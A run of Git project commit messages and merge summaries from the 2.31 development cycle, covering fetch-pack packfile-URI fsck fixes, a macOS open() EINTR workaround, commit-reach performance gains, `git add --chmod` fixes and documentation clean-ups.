The code to fsck objects received across multiple packs during a
single git fetch session has been broken when the packfile URI
feature was in use. A workaround has been added by disabling the
codepath to avoid keeping a packfile that is too small.
* jt/transfer-fsck-across-packs-fix:
fetch-pack: do not mix --pack_header and packfile uri
When fetching (as opposed to cloning) from a repository with packfile
URIs enabled, an error like this may occur:
fatal: pack has bad object at offset 12: unknown object type 5
fatal: finish_http_pack_request gave result -1
fatal: fetch-pack: expected keep then TAB at start of http-fetch output
This bug was introduced in b664e9ffa1 ("fetch-pack: with packfile URIs,
use index-pack arg", 2021-02-22), when the index-pack args used when
processing the inline packfile of a fetch response and when processing
packfile URIs were unified.
This bug happens because fetch, by default, partially reads (and
consumes) the header of the inline packfile to determine if it should
store the downloaded objects as a packfile or loose objects, and thus
passes --pack_header=<...> to index-pack to inform it that some bytes
are missing. However, when it subsequently fetches the additional
packfiles linked by URIs, it reuses the same index-pack arguments, thus
wrongly passing --index-pack-arg=--pack_header=<...> when no bytes are
missing.
This does not happen when cloning because "git clone" always passes
do_keep, which instructs the fetch mechanism to always retain the
packfile, eliminating the need to read the header.
There are a few ways to fix this, including filtering out pack_header
arguments when downloading the additional packfiles, but I decided to
stick to always using index-pack throughout when packfile URIs are
present - thus, Git no longer needs to read the bytes, and no longer
needs --pack_header here.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There were some early changes in the 2.31 cycle to optimize some setup
in diffcore-rename.c[1], some later changes to measure performance[2],
and finally some significant changes to improve rename detection
performance. The final one was merged with the note
Performance optimization work on the rename detection continues.
That works for the commit log, but feels misleading as a release note
since all the changes were within one cycle. Simplify this to just
Performance improvements for rename detection.
The former wording could be seen as hinting that more performance
improvements will come in 2.32, which is true, but we can just cover
those in the 2.32 release notes when the time comes.
[1] a5ac31b5b1 (Merge branch 'en/diffcore-rename', 2021-01-25)
[2] d3a035b055 (Merge branch 'en/merge-ort-perf', 2021-02-11)
[3] 12bd17521c (Merge branch 'en/diffcore-rename', 2021-03-01)
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Work around platforms whose open() is reported to return EINTR (it
shouldn't, as we do our signals with SA_RESTART).
* jk/open-returns-eintr:
config.mak.uname: enable OPEN_RETURNS_EINTR for macOS Big Sur
Makefile: add OPEN_RETURNS_EINTR knob
This commit causes breakage on macOS, or in fact any platform using
older versions of Tcl. Revert it.
* py/revert-commit-comments:
Revert "git-gui: remove lines starting with the comment character"
This reverts commit b9a43869c9.
This commit causes breakage on macOS (10.13). It causes errors on
startup and completely breaks the commit functionality. There are two
main problems. First, it uses `string cat` which is not supported on
older Tcl versions. Second, it does a half close of the bidirectional
pipe to git-stripspace which is also not supported on older Tcl
versions.
Reported-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Pratyush Yadav <me@yadavpratyush.com>
Raise the buffer size used when writing the index file out from
(obviously too small) 8kB to (clearly sufficiently large) 128kB.
* ns/raise-write-index-buffer-size:
read-cache: make the index write buffer size 128K
The logic to handle "trailer" related placeholders in the
"--format=" mechanisms in the "log" family and "for-each-ref"
family is getting unified.
* hv/trailer-formatting:
ref-filter: use pretty.c logic for trailers
pretty.c: capture invalid trailer argument
pretty.c: refactor trailer logic to `format_set_trailers_options()`
t6300: use function to test trailer options
Test script modernization.
* sv/t7001-modernize:
t7001: use `test` rather than `[`
t7001: use here-docs instead of echo
t7001: put each command on a separate line
t7001: use '>' rather than 'touch'
t7001: avoid using `cd` outside of subshells
t7001: remove whitespace after redirect operators
t7001: modernize subshell formatting
t7001: remove unnecessary blank lines
t7001: indent with TABs instead of spaces
t7001: modernize test formatting
The approach to "fsck" the incoming objects in "index-pack" is
attractive for performance reasons (we have them already in core,
inflated and ready to be inspected), but fundamentally cannot be
applied fully when we receive more than one pack stream, as a tree
object in one pack may refer to a blob object in another pack as
".gitmodules", when we want to inspect blobs that are used as
".gitmodules" file, for example. Teach "index-pack" to emit
objects that must be inspected later and check them in the calling
"fetch-pack" process.
* jt/transfer-fsck-across-packs:
fetch-pack: print and use dangling .gitmodules
fetch-pack: with packfile URIs, use index-pack arg
http-fetch: allow custom index-pack args
http: allow custom index-pack args
The common code to deal with "chunked file format" that is shared
by the multi-pack-index and commit-graph files have been factored
out, to help codepaths for both filetypes to become more robust.
* ds/chunked-file-api:
commit-graph.c: display correct number of chunks when writing
chunk-format: add technical docs
chunk-format: restore duplicate chunk checks
midx: use 64-bit multiplication for chunk sizes
midx: use chunk-format read API
commit-graph: use chunk-format read API
chunk-format: create read chunk API
midx: use chunk-format API in write_midx_internal()
midx: drop chunk progress during write
midx: return success/failure in chunk write methods
midx: add num_large_offsets to write_midx_context
midx: add pack_perm to write_midx_context
midx: add entries to write_midx_context
midx: use context in write_midx_pack_names()
midx: rename pack_info to write_midx_context
commit-graph: use chunk-format write API
chunk-format: create chunk format write API
commit-graph: anonymize data in chunk_write_fn
Performance optimization work on the rename detection continues.
* en/diffcore-rename:
merge-ort: call diffcore_rename() directly
gitdiffcore doc: mention new preliminary step for rename detection
diffcore-rename: guide inexact rename detection based on basenames
diffcore-rename: complete find_basename_matches()
diffcore-rename: compute basenames of source and dest candidates
t4001: add a test comparing basename similarity and content similarity
diffcore-rename: filter rename_src list when possible
diffcore-rename: no point trying to find a match better than exact
Preliminary changes to fsmonitor integration.
* jh/fsmonitor-prework:
fsmonitor: refactor initialization of fsmonitor_last_update token
fsmonitor: allow all entries for a folder to be invalidated
fsmonitor: log FSMN token when reading and writing the index
fsmonitor: log invocation of FSMonitor hook to trace2
read-cache: log the number of scanned files to trace2
read-cache: log the number of lstat calls to trace2
preload-index: log the number of lstat calls to trace2
p7519: add trace logging during perf test
p7519: move watchman cleanup earlier in the test
p7519: fix watchman watch-list test on Windows
p7519: do not rely on "xargs -d" in test
This reverts commit c85eec7fc3, as
it is a bit overzealous, we are in prerelease freeze, and we want
to have enough time to get this right and cook in 'next'.
cf. <8735xgkvuo.fsf@evledraar.gmail.com>
We've had mixed reports on whether the latest release of macOS needs
this Makefile knob set. In most reported cases, there's antivirus
software running (which one might imagine could cause an open() call to
be delayed). However, one of the (off-list) reports I've gotten
indicated that it happened on an otherwise clean install of Big Sur.
Since the symptom is so bad (checkout randomly fails to write several
fails when the progress meter kicks in), and since the workaround is so
lightweight (if we don't see EINTR, it's just an extra conditional
check), let's just turn it on by default.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On some platforms, open() reportedly returns EINTR when opening regular
files and we receive a signal (usually SIGALRM from our progress meter).
This shouldn't happen, as open() should be a restartable syscall, and we
specify SA_RESTART when setting up the alarm handler. So it may actually
be a kernel or libc bug for this to happen. But it has been reported on
at least one version of Linux (on a network filesystem):
https://lore.kernel.org/git/c8061cce-71e4-17bd-a56a-a5fed93804da@neanderfunk.de/
as well as on macOS starting with Big Sur even on a regular filesystem.
We can work around it by retrying open() calls that get EINTR, just as
we do for read(), etc. Since we don't ever _want_ to interrupt an open()
call, we can get away with just redefining open, rather than insisting
all callsites use xopen().
We actually do have an xopen() wrapper already (and it even does this
retry, though there's no indication of it being an observed problem back
then; it seems simply to have been lifted from xread(), etc). But it is
used hardly anywhere, and isn't suitable for general use because it will
die() on error. In theory we could combine the two, but it's awkward to
do so because of the variable-args interface of open().
This patch adds a Makefile knob for enabling the workaround. It's not
enabled by default for any platforms in config.mak.uname yet, as we
don't have enough data to decide how common this is (I have not been
able to reproduce on either Linux or Big Sur myself). It may be worth
enabling preemptively anyway, since the cost is pretty low (if we don't
see an EINTR, it's just an extra conditional).
However, note that we must not enable this on Windows. It doesn't do
anything there, and the macro overrides the existing mingw_open()
redirection. I've added a preemptive #undef here in the mingw header
(which is processed first) to just quietly disable it (we could also
make it an #error, but there is little point in being so aggressive).
Reported-by: Aleksey Kliger <alklig@microsoft.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git push $there --delete ''" should have been diagnosed as an
error, but instead turned into a matching push, which has been
corrected.
* jc/push-delete-nothing:
push: do not turn --delete '' into a matching push
A handful of multi-word configuration variable names in
documentation that are spelled in all lowercase have been corrected
to use the more canonical camelCase.
* dl/doc-config-camelcase:
index-format doc: camelCase core.excludesFile
blame-options.txt: camelcase blame.blankBoundary
i18n.txt: camel case and monospace "i18n.commitEncoding"
The "git maintenance register" command had trouble registering bare
repositories, which had been corrected.
* es/maintenance-of-bare-repositories:
maintenance: fix incorrect `maintenance.repo` path with bare repository
Various fixes on "git add --chmod".
* mt/add-chmod-fixes:
add: propagate --chmod errors to exit status
add: mark --chmod error string for translation
add --chmod: don't update index when --dry-run is used
The code to implement "git merge-base --independent" was poorly
done and was kept from the very beginning of the feature.
* ds/merge-base-independent:
commit-reach: stale commits may prune generation further
commit-reach: use heuristic in remove_redundant()
commit-reach: move compare_commits_by_gen
commit-reach: use one walk in remove_redundant()
commit-reach: reduce requirements for remove_redundant()
"git rebase --[no-]fork-point" gained a configuration variable
rebase.forkPoint so that users do not have to keep specifying a
non-default setting.
* ah/rebase-no-fork-point-config:
rebase: add a config option for --no-fork-point
"git grep" has been tweaked to be limited to the sparse checkout
paths.
* mt/grep-sparse-checkout:
grep: honor sparse-checkout on working tree searches
"git difftool" learned "--skip-to=<path>" option to restart an
interrupted session from an arbitrary path.
* zh/difftool-skip-to:
difftool.c: learn a new way start at specified file
"git {diff,log} --{skip,rotate}-to=<path>" allows the user to
discard diff output for early paths or move them to the end of the
output.
* jc/diffcore-rotate:
diff: --{rotate,skip}-to=<path>
The error codepath around the "--temp/--prefix" feature of "git
checkout-index" has been improved.
* mt/checkout-index-corner-cases:
checkout-index: omit entries with no tempname from --temp output
write_entry(): fix misuses of `path` in error messages
Objects that lost references can be pruned away, even when they
have notes attached to it (and these notes will become dangling,
which in turn can be pruned with "git notes prune"). This has been
clarified in the documentation.
* mz/doc-notes-are-not-anchors:
docs: clarify that refs/notes/ do not keep the attached objects alive
Removal of GIT_TEST_GETTEXT_POISON continues.
* ab/detox-gettext-tests:
tests: remove most uses of test_i18ncmp
tests: remove last uses of C_LOCALE_OUTPUT
tests: remove most uses of C_LOCALE_OUTPUT
tests: remove last uses of GIT_TEST_GETTEXT_POISON=false
All other references to blame.* configuration variables are
camelCased already. Update this one to match.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 95791be750 (doc: camelCase the i18n config variables to improve
readability, 2017-07-17), the other i18n config variables were
camel cased. However, this one instance was missed.
Camel case and monospace "i18n.commitEncoding" so that it matches the
surrounding text.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
[jc: fixed 3 other mistakes that are exactly the same]
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Writing an index 8K at a time invokes the OS filesystem and caching code
very frequently, introducing noticeable overhead while writing large
indexes. When experimenting with different write buffer sizes on Windows
writing the Windows OS repo index (260MB), most of the benefit came by
bumping the index write buffer size to 64K. I picked 128K to ensure that
we're past the knee of the curve.
With this change, the time under do_write_index for an index with 3M
files goes from ~1.02s to ~0.72s.
Signed-off-by: Neeraj Singh <neerajsi@ntdev.microsoft.com>
Acked-by: Jeff Hostetler <jeffhost@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If `add` encounters an error while applying the --chmod changes, it
prints a message to stderr, but exits with a success code. This might
have been an oversight, as the command does exit with a non-zero code in
other situations where it cannot (or refuses to) update all of the
requested paths (e.g. when some of the given paths are ignored). So make
the exit behavior more consistent by also propagating --chmod errors to
the exit status.
Note: the test "all statuses changed in folder if . is given" uses paths
added by previous test cases, some of which might be symbolic links.
Because `git add --chmod` will now fail with such paths, this test would
depend on whether all the previous tests were executed, or only some
of them. Avoid that by running the test on a fresh repo with only
regular files.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This error message is intended for humans, so mark it for translation.
Also use error() instead of fprintf(stderr, ...), to make the
corresponding line a bit cleaner, and to display the "error:" prefix,
which helps classifying the nature/severity of the message.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git add --chmod` applies the mode changes even when `--dry-run` is
used. Fix that and add some tests for this option combination.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use FLEX_ALLOC_STR() to allocate the `struct untracked_cache_dir`
for the root directory. Get rid of unsafe code that might fail to
initialize the `name` field (if FLEX_ARRAY is not 1). This will
make it clear that we intend to have a structure with an empty
string following it.
A problem was observed on Windows where the length of the memset() was
too short, so the first byte of the name field was not zeroed. This
resulted in the name field having garbage from a previous use of that
area of memory.
The record for the root directory was then written to the untracked-cache
extension in the index. This garbage would then be visible to future
commands when they reloaded the untracked-cache extension.
Since the directory record for the root directory had garbage in the
`name` field, the `t/helper/test-tool dump-untracked-cache` tool
printed this garbage as the path prefix (rather than '/') for each
directory in the untracked cache as it recursed.
Signed-off-by: Jeff Hostetler <jeffhost@microsoft.com>
Reviewed-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some users (myself included) would prefer to have this feature off by
default because it can silently drop commits.
Signed-off-by: Alex Henrie <alexhenrie24@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When writing a commit-graph, a progress meter is shown which indicates
the number of pieces of data to write (one per commit in each chunk).
In 47410aa837 (commit-graph: use chunk-format write API, 2021-02-18),
the number of chunks became tracked by the new chunk-format API. But a
stray local variable was left behind from when write_commit_graph_file()
used to keep track of the same.
Since this was no longer updated after 47410aa837, the progress meter
appeared broken:
$ git commit-graph write --reachable
Expanding reachable commits in commit graph: 837569, done.
Writing out commit graph in 3 passes: 166% (4187845/2512707), done.
Drop the local variable and rely instead on the chunk-format API to tell
us the correct number of chunks.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we added a syntax sugar "git push remote --delete <ref>" to
"git push" as a synonym to the canonical "git push remote :<ref>"
syntax at f517f1f2 (builtin-push: add --delete as syntactic sugar
for :foo, 2009-12-30), we weren't careful enough to make sure that
<ref> is not empty.
Blindly rewriting "--delete <ref>" to ":<ref>" means that an empty
string <ref> results in refspec ":", which is the syntax to ask for
"matching" push that does not delete anything.
Worse yet, if there were matching refs that can be fast-forwarded,
they would have been published prematurely, even if the user feels
that they are not ready yet to be pushed out, which would be a real
disaster.
Noticed-by: Tilman Vogel <tilman.vogel@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We describe the more strict date formats accepted by GIT_COMMITTER_DATE,
etc, but the --date option also allows the looser approxidate formats,
as well. Unfortunately we don't have a good or complete reference for
this format, but let's at least mention that it _is_ looser, and give a
few examples.
If we ever write separate, more complete date-format documentation, we
should refer to it from here.
Based-on-a-patch-by: Utku Gultopu <ugultopu@gmail.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an error message informs the user about an incorrect command
invocation, it should refer to "arguments", not "parameters".
Signed-off-by: Johannes Sixt <j6t@kdbg.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This adds yet another vimdiff/gvimdiff variant and presents conflicts as
a two-way diff between 'LOCAL' and 'REMOTE'. 'MERGED' is not opened
which deviates from the norm so usage text is echoed as a Vim message on
startup that instructs the user with how to proceed and how to abort.
Vimdiff is well-suited to two-way diffs so this is an option for a more
simple, more streamlined conflict resolution. For example: it is
difficult to communicate differences across more than two files using
only syntax highlighting; default vimdiff commands to get and put
changes between buffers do not need the user to manually specify
a source or destination buffer when only using two buffers.
Like other merge tools that directly compare 'LOCAL' with 'REMOTE', this
tool will benefit when paired with the new `mergetool.hideResolved`
setting.
Signed-off-by: Seth House <seth@eseth.com>
Tested-by: David Aguilar <davvid@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
On Windows we can't delete or overwrite files opened by other processes. Here we
sketch how to handle this situation.
We propose to use a random element in the filename. It's possible to design an
alternate solution based on counters, but that would assign semantics to the
filenames that complicates implementation.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The periodic maintenance tasks configured by `git maintenance start`
invoke `git for-each-repo` to run `git maintenance run` on each path
specified by the multi-value global configuration variable
`maintenance.repo`. Because `git for-each-repo` will likely be run
outside of the repositories which require periodic maintenance, it is
mandatory that the repository paths specified by `maintenance.repo` are
absolute.
Unfortunately, however, `git maintenance register` does nothing to
ensure that the paths it assigns to `maintenance.repo` are indeed
absolute, and may in fact -- especially in the case of a bare repository
-- assign a relative path to `maintenance.repo` instead. Fix this
problem by converting all paths to absolute before assigning them to
`maintenance.repo`.
While at it, also fix `git maintenance unregister` to convert paths to
absolute, as well, in order to ensure that it can correctly remove from
`maintenance.repo` a path assigned via `git maintenance register`.
Reported-by: Clement Moyroud <clement.moyroud@gmail.com>
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Test framework clean-up.
* ab/test-lib:
test-lib-functions: assert correct parameter count
test-lib-functions: remove bug-inducing "diagnostics" helper param
test libs: rename "diff-lib" to "lib-diff"
t/.gitattributes: sort lines
test-lib-functions: move function to lib-bitmap.sh
test libs: rename gitweb-lib.sh to lib-gitweb.sh
test libs: rename bundle helper to "lib-bundle.sh"
test-lib-functions: remove generate_zero_bytes() wrapper
test-lib-functions: move test_set_index_version() to its user
test lib: change "error" to "BUG" as appropriate
test-lib: remove check_var_migration
A small memleak in "diff -I<regexp>" has been corrected.
* ab/diff-deferred-free:
diff: plug memory leak from regcomp() on {log,diff} -I
diff: add an API for deferred freeing
When a pager spawned by us exited, the trace log did not record its
exit status correctly, which has been corrected.
* ab/pager-exit-log:
pager: properly log pager exit code when signalled
run-command: add braces for "if" block in wait_or_whine()
pager: test for exit code with and without SIGPIPE
pager: refactor wait_for_pager() function
Update formatting and grammar of the hash transition plan
documentation, plus some updates.
* ta/hash-function-transition-doc:
doc: use https links
doc hash-function-transition: move rationale upwards
doc hash-function-transition: fix incomplete sentence
doc hash-function-transition: use upper case consistently
doc hash-function-transition: use SHA-1 and SHA-256 consistently
doc hash-function-transition: fix asciidoc output
Signed commits and tags now allow verification of objects, whose
two object names (one in SHA-1, the other in SHA-256) are both
signed.
* bc/signed-objects-with-both-hashes:
gpg-interface: remove other signature headers before verifying
ref-filter: hoist signature parsing
commit: allow parsing arbitrary buffers with headers
gpg-interface: improve interface for parsing tags
commit: ignore additional signatures when parsing signed commits
ref-filter: switch some uses of unsigned long to size_t
Documentation, code and test clean-up around "git stash".
* dl/stash-cleanup:
stash: declare ref_stash as an array
t3905: use test_cmp() to check file contents
t3905: replace test -s with test_file_not_empty
t3905: remove nested git in command substitution
t3905: move all commands into test cases
t3905: remove spaces after redirect operators
git-stash.txt: be explicit about subcommand options
write_commit_graph initialises topo_levels using init_topo_level_slab(),
next it calls compute_topological_levels() which can cause the slab to
grow, we therefore need to clear the slab again using
clear_topo_level_slab() when we're done.
First introduced in 72a2bfca (commit-graph: add a slab to store
topological levels, 2021-01-16).
LeakSanitizer output:
==1026==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 8 byte(s) in 1 object(s) allocated from:
#0 0x498ae9 in realloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:164:3
#1 0xafbed8 in xrealloc /src/git/wrapper.c:126:8
#2 0x7966d1 in topo_level_slab_at_peek /src/git/commit-graph.c:71:1
#3 0x7965e0 in topo_level_slab_at /src/git/commit-graph.c:71:1
#4 0x78fbf5 in compute_topological_levels /src/git/commit-graph.c:1472:12
#5 0x78c5c3 in write_commit_graph /src/git/commit-graph.c:2456:2
#6 0x535c5f in graph_write /src/git/builtin/commit-graph.c:299:6
#7 0x5350ca in cmd_commit_graph /src/git/builtin/commit-graph.c:337:11
#8 0x4cddb1 in run_builtin /src/git/git.c:453:11
#9 0x4cabe2 in handle_builtin /src/git/git.c:704:3
#10 0x4cd084 in run_argv /src/git/git.c:771:4
#11 0x4ca424 in cmd_main /src/git/git.c:902:19
#12 0x707fb6 in main /src/git/common-main.c:52:11
#13 0x7fee4249383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
Indirect leak of 524256 byte(s) in 1 object(s) allocated from:
#0 0x498942 in calloc /src/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
#1 0xafc088 in xcalloc /src/git/wrapper.c:140:8
#2 0x796870 in topo_level_slab_at_peek /src/git/commit-graph.c:71:1
#3 0x7965e0 in topo_level_slab_at /src/git/commit-graph.c:71:1
#4 0x78fbf5 in compute_topological_levels /src/git/commit-graph.c:1472:12
#5 0x78c5c3 in write_commit_graph /src/git/commit-graph.c:2456:2
#6 0x535c5f in graph_write /src/git/builtin/commit-graph.c:299:6
#7 0x5350ca in cmd_commit_graph /src/git/builtin/commit-graph.c:337:11
#8 0x4cddb1 in run_builtin /src/git/git.c:453:11
#9 0x4cabe2 in handle_builtin /src/git/git.c:704:3
#10 0x4cd084 in run_argv /src/git/git.c:771:4
#11 0x4ca424 in cmd_main /src/git/git.c:902:19
#12 0x707fb6 in main /src/git/common-main.c:52:11
#13 0x7fee4249383f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
SUMMARY: AddressSanitizer: 524264 byte(s) leaked in 2 allocation(s).
Signed-off-by: Andrzej Hunt <ajrhunt@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git difftool` only allow us to select file to view in turn.
If there is a commit with many files and we exit in the middle,
we will have to traverse list again to get the file diff which
we want to see. Therefore,teach the command an option
`--skip-to=<path>` to allow the user to say that diffs for earlier
paths are not interesting (because they were already seen in an
earlier session) and start this session with the named path.
Signed-off-by: ZheNing Hu <adlternative@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The remove_redundant_with_gen() algorithm performs a depth-first-search
to find commits in the 'array' list, starting at the parents of each
commit in 'array'. The result is that commits in 'array' are marked
STALE when they are reachable from another commit in 'array'.
This depth-first-search is fast when commits lie on or near the
first-parent history of the higher commits. The search terminates early
if all but one commit becomes marked STALE.
However, it is possible that there are two independent commits with high
generation number. In that case, the depth-first-search might languish
by searching in lower generations due to the fixed min_generation used
throughout the method.
With the expectation that commits with lower generation are expected to
become STALE more often, we can optimize further by increasing that
min_generation boundary upon discovery of the commit with minimum
generation.
We must first sort the commits in 'array' by generation. We cannot sort
'array' itself since it must preserve relative order among the returned
results (see revision.c:mark_redundant_parents() for an example).
This simplifies the initialization of min_generation, but it also allows
us to increase the new min_generation when we find the commit with
smallest generation remaining.
This requires more than two commits in order to test, so I used the
Linux kernel repository with a few commits that are slightly off of the
first-parent history. I timed the following command:
git merge-base --independent 2ecedd756908 d2360a398f0b \
1253935ad801 160bab43419e 0e2209629fec 1d0e16ac1a9e
The first two commits have similar generation and are near the v5.10
tag. Commit 160bab43419e is off of the first-parent history behind v5.5,
while the others are scattered somewhere reachable from v5.9. This is
designed to demonstrate the optimization, as that commit within v5.5
would normally cause a lot of extra commit walking.
Since remove_redundant_with_alg() is called only when at least one of
the input commits has a finite generation number, this algorithm is
tested with a commit-graph generated starting at a number of different
tags, the earliest being v5.5.
commit-graph at v5.5:
| Method | Time |
|-----------------------+-------|
| *_no_gen() | 864ms |
| *_with_gen() (before) | 858ms |
| *_with_gen() (after) | 810ms |
commit-graph at v5.7:
| Method | Time |
|-----------------------+-------|
| *_no_gen() | 625ms |
| *_with_gen() (before) | 572ms |
| *_with_gen() (after) | 517ms |
commit-graph at v5.9:
| Method | Time |
|-----------------------+-------|
| *_no_gen() | 268ms |
| *_with_gen() (before) | 224ms |
| *_with_gen() (after) | 202ms |
commit-graph at v5.10:
| Method | Time |
|-----------------------+-------|
| *_no_gen() | 72ms |
| *_with_gen() (before) | 37ms |
| *_with_gen() (after) | 9ms |
Note that these are only modest improvements for the case where the two
independent commits are not in the commit-graph (not until v5.10). All
algorithms get faster as more commits are indexed, which is not a
surprise. However, the cost of walking extra commits is more and more
prevalent in relative terms as more commits are indexed. Finally, the
last case allows us to jump to the minimum generation between the last
two commits (that are actually independent) so we greatly reduce the
cost in that case.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Reachability algorithms in commit-reach.c frequently benefit from using
the first-parent history as a heuristic for satisfying reachability
queries. The most obvious example was implemented in 4fbcca4e
(commit-reach: make can_all_from_reach... linear, 2018-07-20).
Update the walk in remove_redundant() to use this same heuristic. Here,
we are walking starting at the parents of the input commits. Sort those
parents and walk from the highest generation to lower. Each time, use
the heuristic of searching the first parent history before continuing to
expand the walk.
The order in which we explore the commits matters, so update
compare_commits_by_gen to break generation number ties with commit date.
This has no effect when the commits are in a commit-graph file with
corrected commit dates computed, but it will assist when the commits are
in the region "above" the commit-graph with "infinite" generation
number. Note that we cannot shift to use
compare_commits_by_gen_then_commit_date as the method prototype is
different. We use compare_commits_by_gen for QSORT() as opposed to as a
priority function.
The important piece is to ensure we short-circuit the walk when we find
that there is a single non-redundant commit. This happens frequently
when looking for merge-bases or comparing several tags with 'git
merge-base --independent'. Use a new count 'count_still_independent' and
if that hits 1 we can stop walking.
To update 'count_still_independent' properly, we add use of the RESULT
flag on the input commits. Then we can detect when we reach one of these
commits and decrease the count. We need to remove the RESULT flag at
that moment because we might re-visit that commit when popping the
stack.
We use the STALE flag to mark parents that have been added to the new
walk_start list, but we need to clear that flag before we start walking
so those flags don't halt our depth-first-search walk.
On my copy of the Linux kernel repository, the performance of 'git
merge-base --independent <all-tags>' goes from 1.1 seconds to 0.11
seconds.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Move this earlier in the file so it can be used by more methods.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current implementation of remove_redundant() uses several calls to
paint_down_to_common() to determine that commits are independent of each
other. This leads to quadratic behavior when many inputs are passed to
commands such as 'git merge-base'.
For example, in the Linux kernel repository, I tested the performance
by passing all tags:
git merge-base --independent $(git for-each-ref refs/tags --format="$(refname)")
(Note: I had to delete the tags v2.6.11-tree and v2.6.11 as they do
not point to commits.)
Here is the performance improvement introduced by this change:
Before: 16.4s
After: 1.1s
This performance improvement requires the commit-graph file to be
present. We keep the old algorithm around as remove_redundant_no_gen()
and use it when generation_numbers_enabled() is false. This is similar
to other algorithms within commit-reach.c. The new algorithm is
implemented in remove_redundant_with_gen().
The basic approach is to do one commit walk instead of many. First, scan
all commits in the list and mark their _parents_ with the STALE flag.
This flag will indicate commits that are reachable from one of the
inputs, except not including themselves. Then, walk commits until
covering all commits up to the minimum generation number pushing the
STALE flag throughout.
At the end, we need to clear the STALE bit from all of the commits
we walked. We move the non-stale commits in 'array' to the beginning of
the list, and this might overwrite stale commits. However, we store an
array of commits that started the walk, and use clear_commit_marks() on
each of those starting commits. That method will walk the reachable
commits with the STALE bit and clear them all. This makes the algorithm
safe for re-entry or for other uses of those commits after this walk.
This logic is covered by tests in t6600-test-reach.sh, so the behavior
does not change. This is tested both in the case with a commit-graph and
without.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Knowing about the core.bigFileThreshold configuration variable is
helpful when examining pack file size differences between repositories.
Add a reference to it to the manpages a user is likely to read in this
situation.
Capitalize CONFIGURATION for consistency with other pages having such a
section.
Signed-off-by: Christian Walther <cwalther@gmx.ch>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach index-pack to print dangling .gitmodules links after its "keep" or
"pack" line instead of declaring an error, and teach fetch-pack to check
such lines printed.
This allows the tree side of the .gitmodules link to be in one packfile
and the blob side to be in another without failing the fsck check,
because it is now fetch-pack which checks such objects after all
packfiles have been downloaded and indexed (and not index-pack on an
individual packfile, as it is before this commit).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unify the index-pack arguments used when processing the inline pack and
when downloading packfiles referenced by URIs. This is done by teaching
get_pack() to also store the index-pack arguments whenever at least one
packfile URI is given, and then when processing the packfile URI(s),
using the stored arguments.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is the next step in teaching fetch-pack to pass its index-pack
arguments when processing packfiles referenced by URIs.
The "--keep" in fetch-pack.c will be replaced with a full message in a
subsequent commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, when fetching, packfiles referenced by URIs are run through
index-pack without any arguments other than --stdin and --keep, no
matter what arguments are used for the packfile that is inline in the
fetch response. As a preparation for ensuring that all packs (whether
inline or not) use the same index-pack arguments, teach the http
subsystem to allow custom index-pack arguments.
http-fetch has been updated to use the new API. For now, it passes
--keep alone instead of --keep with a process ID, but this is only
temporary because http-fetch itself will be taught to accept index-pack
parameters (instead of using a hardcoded constant) in a subsequent
commit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use git-stripspace to remove comment lines from the commit message. Also
use it to clean up whitespace instead of rolling our own logic.
* py/commit-comments:
